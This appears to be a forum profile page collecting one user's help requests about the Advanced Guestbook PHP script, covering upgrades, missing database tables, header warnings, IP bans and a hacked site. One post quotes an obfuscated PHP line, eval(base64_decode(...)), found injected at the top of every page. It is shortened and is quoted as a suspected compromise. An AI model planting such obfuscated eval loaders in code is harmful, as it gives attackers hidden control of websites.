If you are not registered or logged in, you may still use these forums but with limited features. Show recent topics
  [Search] Search   [Hottest Topics] Hottest Topics   [Members]  Member Listing   [FAQ]  FAQ 
[Register] Register / 
[Login] Login 
Messages posted by: Masterwebman
Forum Index » Profile for Masterwebman » Messages posted by Masterwebman
In looking over the files, it is not the config.inc.php. They are identical except for the specifics for the site, like database name etc.
I had actually found the db_ubgrade.php in the misc. directory and ran it. It told me I was okay. So, I guess I will compare the 2 config files and see what might be new and missing. I'll keep you posted.
Where is the misc/db_upade.php? On the guestbook site or somewhere in the update? The problem with the header and footer is that the new website designer has changed the structure from my original. Once I get the capcha working, I will have him deal with conforming it to the rest of the site.
thanks.
Thanks Carbonize, but it isn't working properly yet.

1. The capcha doesn't seem to be working, so the form isn't updating. I don't see any of the capcha code at all.

2 The original site had the site header and navigation wrapped around the code, so it displayed with the site name and nav buttons above the guestbook. I am not sure how to include that back in.
thanks,
I built which uses 2.4.1 -- Someone else has taken over as the web master and the site was was hacked and now doesn't function properly. Now the people I built the site for have come back to me to fix it. I would like to update it to 2.4.4. but want to keep the original databases which I believe are okay. Are there any specifics I need to know as my client doesn't want to lose the original data.
thanks
Thanks for getting back to me. I don't understand how the shopping cart could write that code.?Not sure what you mean by short php code? The server is quite up to date and is running php 5. Also, why would the extra code be encrypted. I also found a copy of the shopping cart in a subdirectory in the forum directory along with a folder listed as /public. I removed them.
I have advanced guestbook v 2.4.1 -- a few days ago it stopped working in IE 8 but works in Firefox 3.0.14. The body does not display correctly. I am thinking it could be a css problem but when I examined the the code, (it has been a long time since this version was installed) every page starts with the code below. Has the site been hacked. Is the above code normal?

<? /**/eval(base64_decode('aWYoZnV...Tt9fX0=')); ?>
<?php

I guess we should update, but I am curious about the code I am seeing. Or is there something I can do to get the page to display lately.
The guestbook is on http://www.vixenrock.com
thanks,
Carbonize, thanks -- Your diagnosis was perfect. When I updated I didn't change the templates. Fixed that and ran the db change which I missed. I mistakenly ran your update earlier, but all seems okay.
Appreciate the speedy reply and all the help. You are the best!
I ran the agupdate.php and copied all of the new files. I am having 2 problems.
1. In the Guestbook I get the following listing in all posts.
javascript:getEmail
('6d61696c746f3a6a61636f626a61636f6279373739407961686f6f2e636f2e756b')

2. I get a database error when trying to update:
MySQL Error : Query Error
Error Number: 1146 Table 'vixenroc_agbook2.book_captcha' doesn't exist

Any idea what I did wrong?
thanks
After reading the posts on php errors, I was able to figure it out. The problem was caused by a blank line in the code.
Thanks.
When I log in to the admin, I get the following php errors:

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 33

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 34

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 35

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 36

Can someone tell me what could be wrong. Otherwise the guestbook seems to be working. Thanks,
I used the Admin and was able to log in with the new password set. However, I get the following php error messages:
Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 33

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 34

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 35

Warning: Cannot modify header information - headers already sent by (output started at /home/citizens/public_html/guestbook/admin.php:2) in /home/citizens/public_html/guestbook/lib/admin.class.php on line 36

This is probably associated with some other error. I'll search the board to see if I can find a fix. Any advice would be helpful.
thanks
I can't get a banned ip address to be saved. I enter the number and submit but it just doesn't stick. Any idea what could cause this problem and what would the fix be? I am using Advanced Guestbook 2.3.1

Also, some ip addresses are not indicated by numbers but look something like this: c-67-163-xxx-1x3.client.comcast.net -- Can this type of address be listed?
thanks
After someone signs up the program is sending out 2 identical emails to the site administrator rather than just one. Has anyone had this problem? Any suggestions on how to correct this problem -- sending only one email.
I tried to find upgrading information but couldn't find anything explicit.

The zip file contains to sql files; guestbook.sql and update_v22-23.sql.

If I am updating do I only need to run the update file? Or should I delete the old database and reinstall the tables in guestbook.sql? The readme doesn't explain that.

Can someone give me the steps to updating an existing installation?
1. do I need to delete the old tables before running guestbook.sql again.
2. Or do I just run the update on the current table?
thanks.

Forum Index » Profile for Masterwebman » Messages posted by Masterwebman
Go to:   
Based on the open source JForum